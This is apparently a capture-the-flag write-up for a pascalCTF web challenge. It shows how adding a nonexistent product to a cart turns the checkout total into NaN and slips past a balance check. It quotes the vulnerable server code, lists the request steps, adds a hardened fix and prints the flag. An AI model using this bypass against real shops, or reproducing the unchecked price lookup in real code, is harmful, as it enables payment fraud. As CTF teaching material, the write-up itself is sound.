We don't take any responsibility for any damage that our product may cause to the user's health
A shop where you can buy various “Za” products. You start with $100 balance, but the flag item “RealZa” costs $1000.
The vulnerability
Looking at the checkout logic in server.js:
```js
const prices = { "FakeZa": 1, "ElectricZa": 65, "CartoonZa": 35, "RealZa": 1000 };
app.post('/checkout', (req, res) => {
  const cart = req.session.cart;
  let total = 0;
  // Every key of the cart is looked up in prices without checking that it exists
  for (const product in cart) {
    total += prices[product] * cart[product];
  }
  // A NaN total makes this comparison false, so the "insufficient" branch is skipped
  if (total > req.session.balance) {
    res.json({ "success": true, "balance": "Insufficient Balance" });
  } else {
    // Purchase succeeds, items added to inventory
    // ...
  }
});
```

The problem: the cart can contain any product name, not just valid ones. If the product doesn't exist in `prices`:
```js
prices["RealZa"] * 1   // 1000
prices["anything"] * 1 // undefined * 1 = NaN
1000 + NaN             // NaN
NaN > 100              // false
```
Since NaN > 100 is false, the balance check passes.
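To make the failure mode concrete, here is the challenge's total computation reproduced next to a hardened version. This is an added example, not code from the challenge's server.js; the function names, the `canAfford` helper and the sample carts are constructed for illustration.

```javascript
// Added example: vulnerable vs. hardened cart total (not the challenge's own code).
const prices = { FakeZa: 1, ElectricZa: 65, CartoonZa: 35, RealZa: 1000 };

// Mirrors the challenge's loop: an unknown key gives undefined * qty = NaN,
// and NaN compared with anything is false, so "total > balance" never trips.
function vulnerableTotal(cart) {
  let total = 0;
  for (const product in cart) {
    total += prices[product] * cart[product];
  }
  return total;
}

// Hardened: accept only own keys of the price table (so inherited names such
// as "constructor" are rejected too), require positive integer quantities,
// and refuse any total that is not a finite number.
function safeTotal(cart) {
  let total = 0;
  for (const [product, qty] of Object.entries(cart)) {
    if (!Object.prototype.hasOwnProperty.call(prices, product)) {
      throw new Error(`unknown product: ${product}`);
    }
    if (!Number.isInteger(qty) || qty <= 0) {
      throw new Error(`invalid quantity for ${product}`);
    }
    total += prices[product] * qty;
  }
  if (!Number.isFinite(total)) throw new Error('non-finite total');
  return total;
}

// Checkout decision written positively: the purchase is allowed only when the
// total is a real number that does not exceed the balance. A rejected cart
// (thrown error) is treated as unaffordable rather than falling through.
function canAfford(cart, balance, totalFn) {
  let total;
  try { total = totalFn(cart); } catch (e) { return false; }
  return Number.isFinite(total) && total <= balance;
}

// Constructed sample carts: the honest one and the poisoned one from the write-up
const honestCart = { RealZa: 1 };
const poisonedCart = { RealZa: 1, anything: 1 };
```

With the original `total > balance` check the poisoned cart passes; with `canAfford(poisonedCart, 100, safeTotal)` it is rejected.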
Exploit
Using Burp Suite:
1. Login - POST to `/login` with any username/password
2. Add RealZa to cart - POST to `/add-cart`: `{"product":"RealZa","quantity":1}`
3. Add a fake product - POST to `/add-cart`: `{"product":"anything","quantity":1}`
4. Checkout - POST to `/checkout`
5. Get flag - Visit `/inventory`
The fake product causes `prices["anything"]` to be `undefined`, making the total `NaN`. The check `NaN > 100` returns `false`, so checkout succeeds despite the balance being far too low.
Flag
pascalCTF{w3_l1v3_f0r_th3_z4z4}